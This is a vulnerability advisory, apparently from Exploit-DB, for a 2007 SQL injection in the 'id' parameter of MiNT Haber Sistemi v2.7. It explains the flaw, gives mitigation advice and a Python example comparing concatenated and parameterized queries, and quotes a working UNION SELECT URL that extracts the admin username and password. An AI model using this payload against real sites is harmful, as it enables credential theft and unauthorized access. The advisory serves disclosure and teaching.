Vendor: MiNT Haber Sistemi
By: chernobiLe
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: MiNT Haber Sistemi
Affected Version From: MiNT Haber Sistemi v2.7
Affected Version To: MiNT Haber Sistemi v2.7
Patch Exists: NO
2007

MiNT Haber Sistemi v2.7 (tr) == SQL Injection Vulnerability

MiNT Haber Sistemi v2.7 (tr) is vulnerable to SQL injection through the 'id' parameter of the 'duyuru.asp' page. An attacker who injects SQL code into this parameter can retrieve sensitive information such as the admin's username, password, and email address.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user inputs and use prepared statements or parameterized queries to prevent SQL injection attacks. Additionally, keeping the software up to date with the latest patches and security updates is crucial.
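
The mitigation above as an added example (not code from the product or from the advisory): a Python/SQLite model of a lookup by 'id', checked against the URL-decoded 'id' value from the advisory below. Table uye and its columns come from the advisory; table duyuru, its column names, the sample rows and all function names are assumptions.

```python
import sqlite3

# Constructed stand-in for the application's database. Table uye and columns
# id, kul_adi, sifre come from the advisory; table duyuru and its columns are
# assumptions inferred from the three-column UNION in the advisory.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE duyuru (id INTEGER PRIMARY KEY, baslik TEXT, metin TEXT);
        CREATE TABLE uye (id INTEGER PRIMARY KEY, kul_adi TEXT, sifre TEXT);
        INSERT INTO duyuru VALUES (6, 'Sample title', 'Sample body');
        INSERT INTO uye VALUES (1, 'admin', 'constructed-secret');
    """)
    return db

# The id value from the advisory's URL after URL decoding ('+' becomes a space).
ADVISORY_ID = "6 union select 0,kul_adi,sifre from uye where id=1"

def fetch_vulnerable(db, raw_id):
    # CWE-89: the request value is concatenated into the SQL text, so the
    # database parses it as SQL instead of treating it as data.
    sql = "SELECT id, baslik, metin FROM duyuru WHERE id=" + raw_id
    return db.execute(sql).fetchall()

def fetch_bound_only(db, raw_id):
    # Parameter binding alone: the whole string is compared as one value
    # against the integer column, so no row matches and nothing leaks.
    sql = "SELECT id, baslik, metin FROM duyuru WHERE id = ?"
    return db.execute(sql, (raw_id,)).fetchall()

def fetch_hardened(db, raw_id):
    # 1. Validate: an announcement id is a non-negative decimal integer.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a decimal integer")
    # 2. Bind: the value travels as a parameter and never becomes SQL text.
    sql = "SELECT id, baslik, metin FROM duyuru WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", fetch_vulnerable(db, ADVISORY_ID))
    print("bound only  :", fetch_bound_only(db, ADVISORY_ID))
    print("hardened    :", fetch_hardened(db, "6"))
```

Validation and binding are layered on purpose: binding removes the injection, while the integer check rejects malformed requests early so they can be logged.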
Source

Exploit-DB raw data:

###############################################################
#MiNT Haber Sistemi v2.7 (tr) == SQL Injection Vulnerability
#Author : chernobiLe
#Site : www.cyber-sabotage.org , www.chernobiLe.com
#Contact: info@cyber-sabotage.org
###############################################################
#Risk : High
#Download Link Of MiNT Haber Sistemi v2.7 : http://www.aspindir.com/Goster/4539


#Exploit;
#Admin Nick, Passport, Mail;
http://[SITE]/duyuru.asp?id=6+union+select+0,kul_adi,sifre+from+uye+where+id=1


#Union data Text;
#Duyuru Basligi :  USERNAME
#Duyuru Metni  :    PASSWORD

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM

# milw0rm.com [2007-01-12]